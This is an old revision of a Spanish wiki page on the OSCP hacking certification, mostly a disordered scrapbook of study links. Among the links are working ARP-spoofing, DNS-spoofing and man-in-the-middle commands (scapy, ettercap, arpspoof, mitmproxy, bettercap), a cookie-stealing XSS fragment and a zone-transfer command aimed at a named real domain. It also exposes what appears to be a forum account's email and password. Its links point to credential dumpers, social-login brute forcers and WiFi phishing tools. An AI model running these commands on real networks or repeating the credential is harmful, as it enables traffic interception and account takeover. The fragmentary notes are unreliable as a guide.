¡Esta es una revisión vieja del documento!
Profesional certificado en seguridad ofensiva (OSCP)
Profesional certificado en seguridad ofensiva (OSCP) es una certificación de ethical hacking ofrecida por Offensive Security que enseña metodologías de exámenes de penetración y utilizan herramientas incluyendo el examen de pentración BackTrack (ahora realizado con éxito con la distribución Kali Linux)12 La certificación OSCP consiste en un examen práctico que requiere atacar y penetrar de manera satisfactoria varias maquinas en un ambiente seguro controlado.3 Actualmente, es una de las pocas certificaciones que requiere evidencia de las habilidades en la parte práctica que consiste en una prueba de penetración.
Referencias para prepararse
- shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation
beef project
sitio de boca buscar alert(document.cookie)</script>
dig @200.111.157.67 unap.cl -t AXFR
portnocking
https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/
https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/
https://kali.training/topic/introduction-to-kali-linux/
https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/
(ip.addr == 10.168.40.145) and (!udp contains “HTTP/1.1”)
https://tools.kali.org/information-gathering/nmap
ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1
https://github.com/alearea51/IKn0wU
https://github.com/TunisianEagles/SocialBox
https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne
https://github.com/vk496/linset
https://github.com/WifiPhisher
https://github.com/xtr4nge/FruityWifi
scapy
a = ARP(op=“who-has”, psrc=“192.168.168.2”, pdst=“192.168.168.131”, hwdst=“fe80::4067:2e3f:d06:61bd”)
send(a, inter=3, loop=1)
a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“fe80::4067:2e3f:d06:61bd”)
10.168.40.1
ip a falsear ip victima mac victima a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“08:00:27:52:2D:A0”)
send(a, inter=3, loop=1)
ettercap
ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145///
tcpdump -n -i wlan0 -e 'arp or icmp'
arping -c 1 -I wlan0 10.168.40.1 ARPING 10.168.40.1 60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec 60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec
— 10.168.40.1 statistics —
https://sandilands.info/sgordon/arp-spoofing-on-wired-lan
mitmproxy
arpspoof -i eth0 -t 10.168.40.70 10.168.40.1
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080
mitmproxy –mode transparent
bettercap -T ipvictima –proxy -P
https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/
WIFI
https://github.com/xtr4nge/FruityC2
android https://github.com/M4sc3r4n0/Evil-Droid
extra
https://github.com/nixawk/pentest-wiki
https://geekflare.com/online-scan-website-security-vulnerabilities/
otra
https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion
https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication
https://www.offensive-security.com/metasploit-unleashed/
https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
OSCP
https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md
https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/
https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html
https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/
https://www.exam-labs.com/exam/NSE4#tutorial
https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/
https://wiki.wireshark.org/SampleCaptures
https://github.com/ibr2/pwk-cheatsheet
https://www.keiththome.com/oscp-course-review/
http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/
https://amonsec.net/course/offensive-security-pwk-course-review
https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/
https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/
http://www.vividmachines.com/shellcode/shellcode.html
https://www.securitysift.com/offsec-ctp-osce/
https://hackforums.net/member.php cayuqueo@gmail.com EBM1JUD1yq57pmgUAiqHQ
http://nixware.net/my-osce-journey
http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
https://www.pentesteracademy.com/topics
https://openwall.info/wiki/p_lkrg/Main
https://github.com/tanc7/hacking-books
https://infosecuritygeek.com/vulnhub-kioptrix-2014/
http://www.securitysift.com/offsec-pwb-oscp/
https://xapax.gitbooks.io/security/content/
https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1
https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19
Cupp para crear diccionarios git clone https://github.com/Mebus/cupp.git
Generar ataques de Bruteforce a redes sociales git clone https://github.com/TunisianEagles/SocialBox.git
Dump de passwords (Volcado de memoria) https://github.com/AlessandroZ/LaZagne
Cracking WPA/WPA2 con phishing https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher
instabridge
–mode transparent
mitm.it/cert/p12
bettercap -T [ip_victima] –proxy -P
Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git
https://www.giuspen.com/cherrytree/
https://github.com/mikaelkall/HackingAllTheThings
https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/
https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1
https://github.com/so87/OSCP-PwK
https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0
https://github.com/OlivierLaflamme/Cheatsheet-God
https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1
https://www.giuspen.com/cherrytree/
http://www.fuzzysecurity.com/tutorials/16.html
Good reviews of CTP/OSCE (in no particular order):
Note: * mark means look for other posts on this blog
Tutorial sites (more stars = better/recommended):
Cheatsheets:
Good practice sites:
Vulnerable machines: vulnhub VMs: SickOS 1.1 SickOS 1.2 Droopy v0.2 Kevgir Pegasus SecTalks: BNE0x00 - Minotaur SecTalks: BNE0x03 - Simple NullByte: 1 FristiLeaks 1.3 OWASP Vulnerable Web Applications Directory Project Mutillidae Damn Vulnerable Web Application
LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/
Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory
eBooks downloads: http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/ https://github.com/JpGallegos/CySecBooks https://www.securepla.net/the-hacker-playbook-2/ “Hacking: The Art of Exploitation”
https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo - Fuzzing (Scapy, TAO, Sulley) - Linux Exploitation (vanila stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP) - Web Application Hacker's Handbook (might be too large: Consider “webgoat”)
Various sites: http://www.sweetscape.com/ (010 Editor) https://github.com/campagnola/pycca https://github.com/Gallopsled/pwntools https://github.com/reyammer/shellnoob https://zeltser.com/convert-shellcode-to-assembly/ http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps https://github.com/peterferrie/win-exec-calc-shellcode http://www.secniu.com/why-my-shellcode-cannot-work/ http://thestarman.pcministry.com/asm/2bytejumps.htm http://blog.noobroot.com/ https://www.exploit-db.com/exploits/5342/ http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/ https://github.com/salcho/codetz http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html http://www.fuzzing.org/ http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/ https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ https://0x41.no/hacking-networks-with-snmp/ http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/ http://codemachine.com/downloads.html
Fun random stuff: http://patriciopalladino.com/files/hieroglyphy/ http://n01g3l.tumblr.com/ https://twitter.com/ch3rn0byl/status/832681279900487680
https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/
https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/
https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs
https://github.com/0x90/uberscapy
https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts
https://nets.ec/Main_Page https://old.exploit-db.com/exploits/13284/
https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html
https://underc0de.org/foro/hacking/que-es-una-shellcode/
https://0x00sec.org/t/linux-shellcoding-part-1-0/289
https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html
https://github.com/Grazfather/PracticalMalwareLabs https://github.com/Grazfather/BlackHatPython
https://github.com/VulnHub/ctf-writeups
https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html
https://exploit.courses/#/challenges
https://payatu.com/guide-linux-privilege-escalation/
https://github.com/dobin/yookiterm-slides
https://exploit.courses/files/bfh2018/content.html
https://exploit.courses/files/bfh2017/content.html
https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/
https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
https://www.exploit-db.com/exploits/44298
https://github.com/jivoi/pentest
https://github.com/lucyoa/kernel-exploits
https://github.com/Manisso/fsociety
Fsociety Hacking Tools Pack. A Penetration Testing Framework, you will have every script that a hacker needs
Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+. https://github.com/nbulischeck/tyton https://nbulischeck.github.io/tyton/
https://github.com/fireeye/flare-vm - FLARE VM - a fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc.
https://github.com/frizb/Vanquish
Vanquish is a Kali Linux based Enumeration Orchestrator built in Python. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases. The results of each phase are fed into the next phase to identify vulnerabilities that could be leveraged for a remote shell.
https://www.youtube.com/watch?v=YoNrNBnmwuY&feature=youtu.be
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://www.oracle.com/technetwork/community/developer-vm/index.html
https://github.com/buglessdr?tab=repositories
https://github.com/buglessdr/oscp-1
https://github.com/buglessdr/myarsenal
https://github.com/buglessdr/linux-exploit-suggester
https://github.com/buglessdr/OSCP-2
https://github.com/pentestmonkey
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
https://github.com/ston3o/docker-hacklab
https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4
http://overthewire.org/wargames/
https://github.com/SecWiki/linux-kernel-exploits
https://opnsense.org/download/
https://github.com/thelinuxchoice?tab=repositories
https://github.com/osirislab/Hack-Night/
http://www.opensecuritytraining.info/Exploits1.html
http://www.opensecuritytraining.info/Exploits2.html